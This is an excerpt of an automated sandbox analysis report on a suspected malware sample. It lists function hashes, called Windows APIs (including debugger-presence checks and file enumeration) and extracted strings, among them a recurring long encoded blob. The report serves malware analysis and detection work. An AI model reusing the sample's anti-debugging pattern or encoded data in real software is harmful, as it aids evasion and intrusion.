                                                              • Opcode Fuzzy Hash: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                              • Instruction Fuzzy Hash: 6792C670B0A3159BD724DF18E58563EBAE1EB94700FA8891FE5C9CB390D679CC418B4B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: (lu$)lu$)lu$n_v$n_v$u2B$v2B$v2B
                                                              • API String ID: 4218353326-1100714106
                                                              • Opcode ID: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
                                                              • Instruction ID: a2355ce2209b5258348a648dcbfed05c01f212a34098c733ae6d56c92e88b106
                                                              • Opcode Fuzzy Hash: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
                                                              • Instruction Fuzzy Hash: 717284B2D001199BCF64CFAC848557EB6B0BB18310F24251BD55AEB351E3B89E91CF9B
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
                                                              • Instruction ID: 851cf4d307f2775529c2b2c48624cd02a74d3cb87db6a9e2c754e45b37c83e55
                                                              • Opcode Fuzzy Hash: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
                                                              • Instruction Fuzzy Hash: C5D23B71E082288FDB65CE24DD407EAB7B5EB44306F1445EBD80DE7241EB78AE898F45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleModuleName
                                                              • String ID: T5 S$U5 S$U5 S$]cnq$fS))
                                                              • API String ID: 2106025501-2879408294
                                                              • Opcode ID: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
                                                              • Instruction ID: dfb0ff48f0b3588d0c8ddc0fc82928454e0cf031636ecd05e75d9b592114eb49
                                                              • Opcode Fuzzy Hash: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
                                                              • Instruction Fuzzy Hash: B2A271B07097118BD724EF1DE69522EBBE0EB94750FA58D1FE185CB350E638C8819B4B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (lu$)lu$)lu$n_v$n_v
                                                              • API String ID: 0-3830700584
                                                              • Opcode ID: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                              • Instruction ID: 4a2fd8414ffc0d2b7e824df66967180c6b9bc980e05f2bb9b5fb8abbe135a622
                                                              • Opcode Fuzzy Hash: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                              • Instruction Fuzzy Hash: 1D22B478D0460A9BCF24CF9DC8956FFBBB0EB14304F24052BD515EB351D3789A868B9A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strrchr
                                                              • String ID:
                                                              • API String ID: 3213747228-0
                                                              • Opcode ID: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
                                                              • Instruction ID: 8ec8fb1480d7890853f4d9f50d5551423c0e27afaeab5e375f7c18d1f8a446b0
                                                              • Opcode Fuzzy Hash: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
                                                              • Instruction Fuzzy Hash: 7EB147329002559FFB11CF68C8817EFBBA5EF55304F14817BE815AB342D6389D0ACB69
                                                              APIs
                                                              • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452057
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
                                                              • FindClose.KERNEL32(00000000), ref: 004520F4
                                                              • FindClose.KERNEL32(00000000), ref: 00452117
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$FirstNext
                                                              • String ID:
                                                              • API String ID: 1164774033-0
                                                              • Opcode ID: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
                                                              • Instruction ID: 88b061fe18a59ed71dd7726e396f37314d98d9ff08531aa008276cfa6a830ce1
                                                              • Opcode Fuzzy Hash: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
                                                              • Instruction Fuzzy Hash: 4F411971901519AFDF20DF64DD88ABFB379EB4530AF004197E905D3181E7B89E88CB69
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043CEA1
                                                              • IsDebuggerPresent.KERNEL32 ref: 0043CF6D
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043CF8D
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043CF97
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                              • Instruction ID: 9043f40afcec0259649162862996236607bac432cbf7b643fd488768b54bd5d0
                                                              • Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                              • Instruction Fuzzy Hash: 57312BB5D05219DBDB10DF65D989BCDBBB8AF08304F1040AAE40DA7250EBB55A84CF49
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 008BD108
                                                              • IsDebuggerPresent.KERNEL32 ref: 008BD1D4
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008BD1F4
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 008BD1FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                              • Instruction ID: fd136ee3c906d7a0c1b6e93d7987c7766eedd2a21a12b2222822fff26f72981a
                                                              • Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                              • Instruction Fuzzy Hash: 5D312875901318ABDB20DF64D989BCDBBB8FF08304F1040AAE40CA7250EBB19A85CF55
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00405C85), ref: 0044E433
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00405C85), ref: 0044E43D
                                                              • UnhandledExceptionFilter.KERNEL32(0045F807,?,?,?,?,?,00405C85), ref: 0044E44A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
                                                              • Instruction ID: af30a7423d53b2ed9e05bfdfaa0a26c4abe4ecd8aa3d0fdc8ac6f86824fa8700
                                                              • Opcode Fuzzy Hash: b1a3c3a0be8d6b4b88a7661e414be1e1f565848d8e3606674681f7b5372028ed
                                                              • Instruction Fuzzy Hash: 2231C4749012299BCB21DF65D889BCDBBB8BF08310F5041EAE81CA7250E7749F858F49
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000200), ref: 00424C0E
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00424C22
                                                              • CloseHandle.KERNEL32(00000000), ref: 00424C2E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleModuleName
                                                              • String ID:
                                                              • API String ID: 2106025501-0
                                                              • Opcode ID: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                              • Instruction ID: 0f79836f08216e1067b19f7748282cd10e66abfb9a44897a3127195f29ea1e18
                                                              • Opcode Fuzzy Hash: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                              • Instruction Fuzzy Hash: 97F0A071201130BBD2349B2AEC4CF57BF6CEF86B70F014215FB19AB2A0D2789812C6D5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: =`f\
                                                              • API String ID: 4218353326-984147390
                                                              • Opcode ID: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
                                                              • Instruction ID: 937e01e95affed1bb86c4fb585bebd6cec6f4652e38a753aecbb8c34d3dca93f
                                                              • Opcode Fuzzy Hash: cefc6376a0a262524adde921cf2748f1d933b06b63e13b6ea41360376ed59fc9
                                                              • Instruction Fuzzy Hash: E5822671508301AFDB14CF19C880AABBBE1FF88344F04892EF99987391D779D995CB96
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: =`f\
                                                              • API String ID: 4218353326-984147390
                                                              • Opcode ID: c84d8bab664dab9cd0f48d91de88ba0d679f2a9024c898dd52fba93cb0488266
                                                              • Instruction ID: 318749226ae2eaf1d54c956836e05046f04150b6d1b63a1857d515818c216ca8
                                                              • Opcode Fuzzy Hash: c84d8bab664dab9cd0f48d91de88ba0d679f2a9024c898dd52fba93cb0488266
                                                              • Instruction Fuzzy Hash: A0823071608345EFDB14DF18C880AAABBE1FF88304F48892DF98987391D735E954DB92
                                                              Strings
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0043C0A4, 0043C33A
                                                              • y_B>, xrefs: 0043C00B
                                                              • y_B>, xrefs: 0043C403
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$y_B>$y_B>
                                                              • API String ID: 0-3325869852
                                                              • Opcode ID: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                              • Instruction ID: c217e240e4de63698dbdc007ec6427f3aed3e10ff69f5bbbebf730a7c1cd9681
                                                              • Opcode Fuzzy Hash: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                              • Instruction Fuzzy Hash: B5328371D0011A8BDF249A9889916BFB670EF58320F24792BD515FB390D73C9E428BDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 3333$UUUU$UUUU
                                                              • API String ID: 0-1588839328
                                                              • Opcode ID: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                              • Instruction ID: db216e20b05cf36e7dbad7cd7ff9f755db6c04a52abf1afa55db9664f95289aa
                                                              • Opcode Fuzzy Hash: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                              • Instruction Fuzzy Hash: 31419FB1610704CBCB588F19C88479277E6ABD8320F5981AADD058F38AE7B9CCC5CBC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$GetProcAddress.$l
                                                              • API String ID: 0-2784972518
                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction ID: f3d91120766a02e33a9fa05b12d28410e080fcf066640d8f17665adcd8ab3234
                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction Fuzzy Hash: 0B314BB6900609DFDB50DF99C880AADBBF5FF48324F25414AD841E7211D771EA49CFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                              • Instruction ID: d31693203e36b13fa643c34ed7d2e873ec4fc83637a871ea5abd7a03a4c8c85c
                                                              • Opcode Fuzzy Hash: abc98001e59703e17e9a34c2f345cf9d82059dae5fbe9420c98e1510437f35f7
                                                              • Instruction Fuzzy Hash: 59F14071E012199FDF14CFA9C8806AEB7B1FF89314F15826EE915A7390DB34AD41CB94
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D61E
                                                                • Part of subcall function 0044C5A0: _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                                • Part of subcall function 0044C5A0: __FindPESection.LIBCMT ref: 0044C6D1
                                                              • _CallDestructExceptionObject.LIBVCRUNTIME ref: 0043D6A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallDestructExceptionFindHandlersObjectScopeSectionTableValidate___except_validate_context_record
                                                              • String ID:
                                                              • API String ID: 4086067019-0
                                                              • Opcode ID: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                              • Instruction ID: d36a7cbcb2159855d2e740cbd3865162507ac70638f688864eb4f2737716b515
                                                              • Opcode Fuzzy Hash: 32225782116d6d1d5b8b44fa1553e41c01ad0d105c6fff44bcf9d4353cf2325d
                                                              • Instruction Fuzzy Hash: BC21FC72D01204ABDB14EF69DCC19ABBBA5FF48314F098069ED198B246E734F915CBE4
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 008BD885
                                                              • _CallDestructExceptionObject.LIBVCRUNTIME ref: 008BD907
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallDestructExceptionObject___except_validate_context_record
                                                              • String ID:
                                                              • API String ID: 3557573858-0
                                                              • Opcode ID: c239e74d4f3c73cbfb2ec52de4c1c0d13c538d5be237da1c9bce762e36d27d04
                                                              • Instruction ID: 51a8d7ebd36b14ff6d3aaed1159c1a14c7f1bb951609b5c1c12f82fb3b545c98
                                                              • Opcode Fuzzy Hash: c239e74d4f3c73cbfb2ec52de4c1c0d13c538d5be237da1c9bce762e36d27d04
                                                              • Instruction Fuzzy Hash: AD21A272900205ABCB14EF68CC819ABBBA5FF45350F458068E919DB246E731F925CBE1
                                                              APIs
                                                              • GetSystemTimeAsFileTime.KERNEL32(00418E08,FFFFFFF9,?,?,?,?,00418E08,00000000), ref: 00446164
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00446183
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1518329722-0
                                                              • Opcode ID: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                              • Instruction ID: 61ae58f5a109cdc23c8a561ccb435e29d9a033fb164f50c0495edfbe46b21ef4
                                                              • Opcode Fuzzy Hash: eee1a95b8517425e3b7839049f316366bcb153acad07d488873c9a132efa3553
                                                              • Instruction Fuzzy Hash: 00F0F4B1B001147B6B24DF2D880489FBEE9EAC6364726825BE809D3345E574DD05C295
                                                              Strings
                                                              • y_B>, xrefs: 00427CEA
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 00427E0D, 00427F9F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$y_B>
                                                              • API String ID: 0-4284854988
                                                              • Opcode ID: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                              • Instruction ID: 4c2ea87e6ed6cce11d3262b2c37c8ab9346d24596443f962e79d9f7238e8cba2
                                                              • Opcode Fuzzy Hash: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                              • Instruction Fuzzy Hash: E11241B170D361CBDB249F18E49153EBAE4AB94310FA54A5FE0C9CB364D678D8C19B0B
                                                              Strings
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 004017E7
                                                              • VUUU, xrefs: 004015EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$VUUU
                                                              • API String ID: 0-3577787444
                                                              • Opcode ID: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                              • Instruction ID: 8f7341bf09dd7d88668ef3d11c74458aa2ddba69b727948ac3827fc30a91a2a0
                                                              • Opcode Fuzzy Hash: 98b115f5f95ee34da68bc11d1b4f95177fde0c9a6d3e400caf3ce09c2dcad771
                                                              • Instruction Fuzzy Hash: 29C1A7756183019BDB1C8A19C59153EBBE5AB85314F24C93FE15ADB3F4E23CD8419B0B
                                                              Strings
                                                              • U, xrefs: 0041EA43
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0041E890, 0041E9DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$U
                                                              • API String ID: 0-800005648
                                                              • Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                              • Instruction ID: 920c4e3f9504e8d2d4b163527b25bc307261b88a0300f18b1f19330db72b497f
                                                              • Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                              • Instruction Fuzzy Hash: BF91D67D61C3018BDB249B5A84856BEBBE1BF85710F144C1FE9A9CB390D238D8C19B1B
                                                              Strings
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0089EAF7, 0089EC43
                                                              • U, xrefs: 0089ECAA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$U
                                                              • API String ID: 0-800005648
                                                              • Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                              • Instruction ID: 0f2a9bfb6da37765d77206c243b55d034d8eb850f002df2f931c5c96a0b65206
                                                              • Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                              • Instruction Fuzzy Hash: 9D918E715182459FCF64EB1C84C163DBEE0FB89758F284E2EE0CACA261D235C9859B57
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0045D0B5,?,?,00000008,?,?,0045CC90,00000000), ref: 0045D387
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
